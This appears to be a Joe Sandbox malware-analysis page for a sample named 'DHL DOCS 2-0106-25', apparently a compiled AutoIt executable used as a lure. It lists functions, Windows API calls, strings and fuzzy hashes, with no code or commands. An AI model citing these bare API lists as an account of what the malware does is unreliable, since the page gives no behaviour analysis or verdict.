Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 6cb1446c763548405844c630c22ef50e27f84c52e9255eef6b5328048024fead
Instruction ID: f746c47d505dd879763a3f00f966177ffb5a0105262499a26b38a2bb15c34cc8
Opcode Fuzzy Hash: 6cb1446c763548405844c630c22ef50e27f84c52e9255eef6b5328048024fead
Instruction Fuzzy Hash: CD51A2B1A2021B9BCF14DF68C9508BEB7A5BF65724F204229F426EB284EB34DD51C790

Function 0023372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00233774
CoUninitialize.OLE32 ref: 0023377F
CoCreateInstance.OLE32(?,00000000,00000017,0024FB78,?), ref: 002337D9
IIDFromString.OLE32(?,?), ref: 0023384C
VariantInit.OLEAUT32(?), ref: 002338E4
VariantClear.OLEAUT32(?), ref: 00233936

Strings

Failed to create object, xrefs: 002337E4, 0023389A
Invalid parameter, xrefs: 00233865
NULL Pointer assignment, xrefs: 0023381E

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 2d51cc08b3719c37ef1c5c8039534fa50c605c44eb52105331e7bbbe134b5162
Instruction ID: 9a9cf1c08fc9ad87e568bc6c51afe23ae844b4eb683c8a264875e6575a3f655b
Opcode Fuzzy Hash: 2d51cc08b3719c37ef1c5c8039534fa50c605c44eb52105331e7bbbe134b5162
Instruction Fuzzy Hash: C261AEB0628301AFD311DF54D889FAABBE8EF59710F104919F9859B291C770EF58CB92

Function 00223388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002233CF

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002233F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00223504
"%s" (%d) : ==> %s:, xrefs: 00223522
Error: , xrefs: 002234D1
^ ERROR , xrefs: 0022349E
Incorrect parameters to object property !, xrefs: 002234AB
Line %d (File "%s"):, xrefs: 00223443, 0022345C

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: f52258ed3e5fb16a84cf2b6363c3654cb32a8b0c6262c4539a1e38ba1eb8b1c5
Instruction ID: a23f06245e3bf6d3d8f45af465128491ffc760d8dbb05f2ec978758670b14de2
Opcode Fuzzy Hash: f52258ed3e5fb16a84cf2b6363c3654cb32a8b0c6262c4539a1e38ba1eb8b1c5
Instruction Fuzzy Hash: AE51B331900219BADF14EBE0DD56EEEB7B8AF24300F604065F109720A2DB356FA9DF60

Function 0021B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0021B5FC
_wcslen.LIBCMT ref: 0021B608
_wcslen.LIBCMT ref: 0021B64D
_wcslen.LIBCMT ref: 0021B68C
_wcslen.LIBCMT ref: 0021B6C7

Strings

EXISTS, xrefs: 0021B686, 0021B68B
REMOVE, xrefs: 0021B602, 0021B607
KEYS, xrefs: 0021B647, 0021B64C
APPEND, xrefs: 0021B6C1, 0021B6C6

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: e9400164f97145f40178750d852ce00af2bfe329a1b1b074fe4bf81d12d5c42b
Instruction ID: 0da9b7f8772edc1057f8c263f6203162c393d96e2374f822cb46c4c233c66730
Opcode Fuzzy Hash: e9400164f97145f40178750d852ce00af2bfe329a1b1b074fe4bf81d12d5c42b
Instruction Fuzzy Hash: F541D432A201679BCB216F7D88A05FEB7F9ABB0794B244129E425DB284E731CDD1C790

Function 00225393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002253A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00225416
GetLastError.KERNEL32 ref: 00225420
SetErrorMode.KERNEL32(00000000,READY), ref: 002254A7

Strings

NOTREADY, xrefs: 0022544B
INVALID, xrefs: 00225459
READY, xrefs: 00225460, 00225468
UNKNOWN, xrefs: 00225444
READONLY, xrefs: 00225452

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 1fb0fe55dc715964f9ba1825eaf8aa88d88840932fd98d3aceec1027d73fd1f9
Instruction ID: fa16c987fe6ba9d0a078796190268afcadf10dab2c1069145621d60cc4c8cf69
Opcode Fuzzy Hash: 1fb0fe55dc715964f9ba1825eaf8aa88d88840932fd98d3aceec1027d73fd1f9
Instruction Fuzzy Hash: B7310535A10525AFC710EFA8E488AE9BBF4FF15305F14C056E505CB292D770DD92CB90

Function 0021B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0021B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0021A1E1,?,00000001), ref: 0021B165
GetWindowThreadProcessId.USER32(00000000), ref: 0021B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0021A1E1,?,00000001), ref: 0021B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0021B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0021A1E1,?,00000001), ref: 0021B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0021A1E1,?,00000001), ref: 0021B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0021A1E1,?,00000001), ref: 0021B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0021A1E1,?,00000001), ref: 0021B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0021A1E1,?,00000001), ref: 0021B21D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: e47da5c74bab3fab4f5158bf72239fa919b203a6e2ae0af4d92b176d50b66a9b
Instruction ID: a0bd9d62ea496740c82faa5352375691272cff91514d74dac3505df4cd8e8f6b
Opcode Fuzzy Hash: e47da5c74bab3fab4f5158bf72239fa919b203a6e2ae0af4d92b176d50b66a9b
Instruction Fuzzy Hash: CC31BF79522205BFDB12EF68EC5CFAD7BB9BB61711F218014FA04D6190D7B49A848F60

Function 001E2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001E2C94

Part of subcall function 001E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000), ref: 001E29DE
Part of subcall function 001E29C8: GetLastError.KERNEL32(00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000,00000000), ref: 001E29F0

_free.LIBCMT ref: 001E2CA0
_free.LIBCMT ref: 001E2CAB
_free.LIBCMT ref: 001E2CB6
_free.LIBCMT ref: 001E2CC1
_free.LIBCMT ref: 001E2CCC
_free.LIBCMT ref: 001E2CD7
_free.LIBCMT ref: 001E2CE2
_free.LIBCMT ref: 001E2CED
_free.LIBCMT ref: 001E2CFB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8f7cbdee1a29131d94a80cf33fe8605e7e36b085a416dff14cfe8f3b6f70aa30
Instruction ID: 0b237517cfd4717270112ac57baedc0e3d240a8b56f5b724c15c804df5d94113
Opcode Fuzzy Hash: 8f7cbdee1a29131d94a80cf33fe8605e7e36b085a416dff14cfe8f3b6f70aa30
Instruction Fuzzy Hash: 9A11043610045CAFCB06EF56D892CDC3BA9FF15344F4250A0FA489F222DB35EE509B90

Function 001B1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001B1459
OleUninitialize.OLE32(?,00000000), ref: 001B14F8
UnregisterHotKey.USER32(?), ref: 001B16DD
DestroyWindow.USER32(?), ref: 001F24B9
FreeLibrary.KERNEL32(?), ref: 001F251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 001F254B

Strings

close all, xrefs: 001B1454

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: f473c845475f44309b6707752b1d30e062329d39711f5e967e16a248001a361f
Instruction ID: 8883049036fbc8309f13945ae12545ca68baa6f31189f095460cd1ef3d962802
Opcode Fuzzy Hash: f473c845475f44309b6707752b1d30e062329d39711f5e967e16a248001a361f
Instruction Fuzzy Hash: A1D17E31702212DFCB29EF54D4A9AB9F7A1BF15710F6641ADE94A6B261CB30EC12CF50

Function 001B5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 001B5C7A

Part of subcall function 001B5D0A: GetClientRect.USER32(?,?), ref: 001B5D30
Part of subcall function 001B5D0A: GetWindowRect.USER32(?,?), ref: 001B5D71
Part of subcall function 001B5D0A: ScreenToClient.USER32(?,?), ref: 001B5D99

GetDC.USER32 ref: 001F46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001F4708
SelectObject.GDI32(00000000,00000000), ref: 001F4716
SelectObject.GDI32(00000000,00000000), ref: 001F472B
ReleaseDC.USER32(?,00000000), ref: 001F4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001F47C4

Strings

U, xrefs: 001F4693

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 2bf2753343da393f51c2340d4a69bfc9dc1d74ad213fd2b03b889e7328f66409
Instruction ID: a9151392470a5ab0273beeccc94c520d83bd9ddd335f31b64d256bcbe5446197
Opcode Fuzzy Hash: 2bf2753343da393f51c2340d4a69bfc9dc1d74ad213fd2b03b889e7328f66409
Instruction Fuzzy Hash: 2071F134400209DFCF25DF64C984AFB7BBAFF4A360F284269EE559A2A6C3318841DF50

Function 0022359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002235E4

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

LoadStringW.USER32(00282390,?,00000FFF,?), ref: 0022360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00223724
"%s" (%d) : ==> %s:, xrefs: 00223742
^ ERROR, xrefs: 002236C9
Error: , xrefs: 002236EF
Line %d (File "%s"):, xrefs: 0022366B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 98b59f57a50f8d72f08b09ccb2bcc8b4b8a0602f81c393acad5cde0b40acdd49
Instruction ID: 724a1a38a22bc7e7eca98f7ffe14f5cd37bb2485d8f9d8fce6bb561f63de517b
Opcode Fuzzy Hash: 98b59f57a50f8d72f08b09ccb2bcc8b4b8a0602f81c393acad5cde0b40acdd49
Instruction Fuzzy Hash: 5651817181021ABBCF14EBE0DC96EEEBB78AF24300F144165F105721A1DB355BA9DF60

Function 00242DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00242E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00242E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00242E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00242EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00242EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00242EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00242F0B

Strings

8], xrefs: 00242E00, 00242E34, 00242E69, 00242EA1, 00242EC5, 00242EFD

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: 8]
API String ID: 2178440468-438778366
Opcode ID: 5745d7d350c7006e518c18633514b37757935d0406da46634a7759bc707d361c
Instruction ID: 5a3ae2e88059d8c80ae7368d5313120fdea95d00ce96daee21aadefd7b0d9182
Opcode Fuzzy Hash: 5745d7d350c7006e518c18633514b37757935d0406da46634a7759bc707d361c
Instruction Fuzzy Hash: 29313438716151DFDB298F19EC88F6537E8EB8AB10F950064F9149B2B2CB71B869DB00

Function 0022C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0022C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0022C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0022C2CA
GetLastError.KERNEL32 ref: 0022C322
SetEvent.KERNEL32(?), ref: 0022C336
InternetCloseHandle.WININET(00000000), ref: 0022C341

Strings

, xrefs: 0022C2BB

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 74e92d7042cc3be609bb2ca9771838d1dbc8120cd77da6a3460ca8d18accc1b1
Instruction ID: 9ed28aa6512852039613462d4c04f8608024dfccc738d4038b95d0280da6b2d5
Opcode Fuzzy Hash: 74e92d7042cc3be609bb2ca9771838d1dbc8120cd77da6a3460ca8d18accc1b1
Instruction Fuzzy Hash: 85319FB1510614BFD721DFA8AC88AAF7BFCEB49744B20891EF44697210DB70DD548B60

Function 0021989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001F3AAF,?,?,Bad directive syntax error,0024CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002198BC
LoadStringW.USER32(00000000,?,001F3AAF,?), ref: 002198C3

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00219987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 002198F1
., xrefs: 0021996D
Line %d:, xrefs: 00219912
Error: , xrefs: 00219955
Line %d (File "%s"):, xrefs: 0021992D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 3a6a4b9597fcaa3993ac612fe461e184ad3f18f5e285c54ea8d9909dcb92ca7e
Instruction ID: 56a04940102a2afc93b18488505f8d456e9172b8ea1fe5de1b9f85c27f136d01
Opcode Fuzzy Hash: 3a6a4b9597fcaa3993ac612fe461e184ad3f18f5e285c54ea8d9909dcb92ca7e
Instruction Fuzzy Hash: BF219131C1021EBBCF15AF90CC1AEEE7B79FF29700F044459F519660A2EB719AA8DB10

Function 0021209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002120AB
GetClassNameW.USER32(00000000,?,00000100), ref: 002120C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0021214D

Strings

largeicons, xrefs: 002120E1
details, xrefs: 002120FB
SHELLDLL_DefView, xrefs: 002120CC
list, xrefs: 0021212F
smallicons, xrefs: 00212115

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 317405fb5ba53032a730e98cc68807fba30ce9b08d3a362fe86c41d7c951d7a2
Instruction ID: 3051592b9f18bf4e19a4371c430073c4c9f5e55aef3558c681dea36d4a54ac39
Opcode Fuzzy Hash: 317405fb5ba53032a730e98cc68807fba30ce9b08d3a362fe86c41d7c951d7a2
Instruction Fuzzy Hash: F1113A7A6A8717FBF605A620EC0ADFA73DCCB26324B205016FB0DA50D2FBB158B95514

Function 001E8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629441d6ac22097756cdbf81a5eb03b7ca9482d6e690c000f2637c866e3c2010
Instruction ID: 992875fae9e2e0d7e7d18e04d67103ddd39cea4b22b696c918adcabb8534bb98
Opcode Fuzzy Hash: 629441d6ac22097756cdbf81a5eb03b7ca9482d6e690c000f2637c866e3c2010
Instruction Fuzzy Hash: 68C13574D04689AFCF11DFAAD845BADBBB4BF19310F044199F919AB392CB308A41CB60

Function 001ECE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 001ECEB7
_free.LIBCMT ref: 001ECF22
_free.LIBCMT ref: 001ECF48
_free.LIBCMT ref: 001ECF71
_free.LIBCMT ref: 001ECFA9
_free.LIBCMT ref: 001ECFDA
_free.LIBCMT ref: 001ED01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 001ED09C
_free.LIBCMT ref: 001ED0B5

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 586ab6b39d17a3b24a8b42a28267ad57289998982383b5b63bb6b96b478cfc26
Instruction ID: 9448131646a46eecf4e009993c7cb3aa7733c255ffdbfe6cd3dced690ce7c339
Opcode Fuzzy Hash: 586ab6b39d17a3b24a8b42a28267ad57289998982383b5b63bb6b96b478cfc26
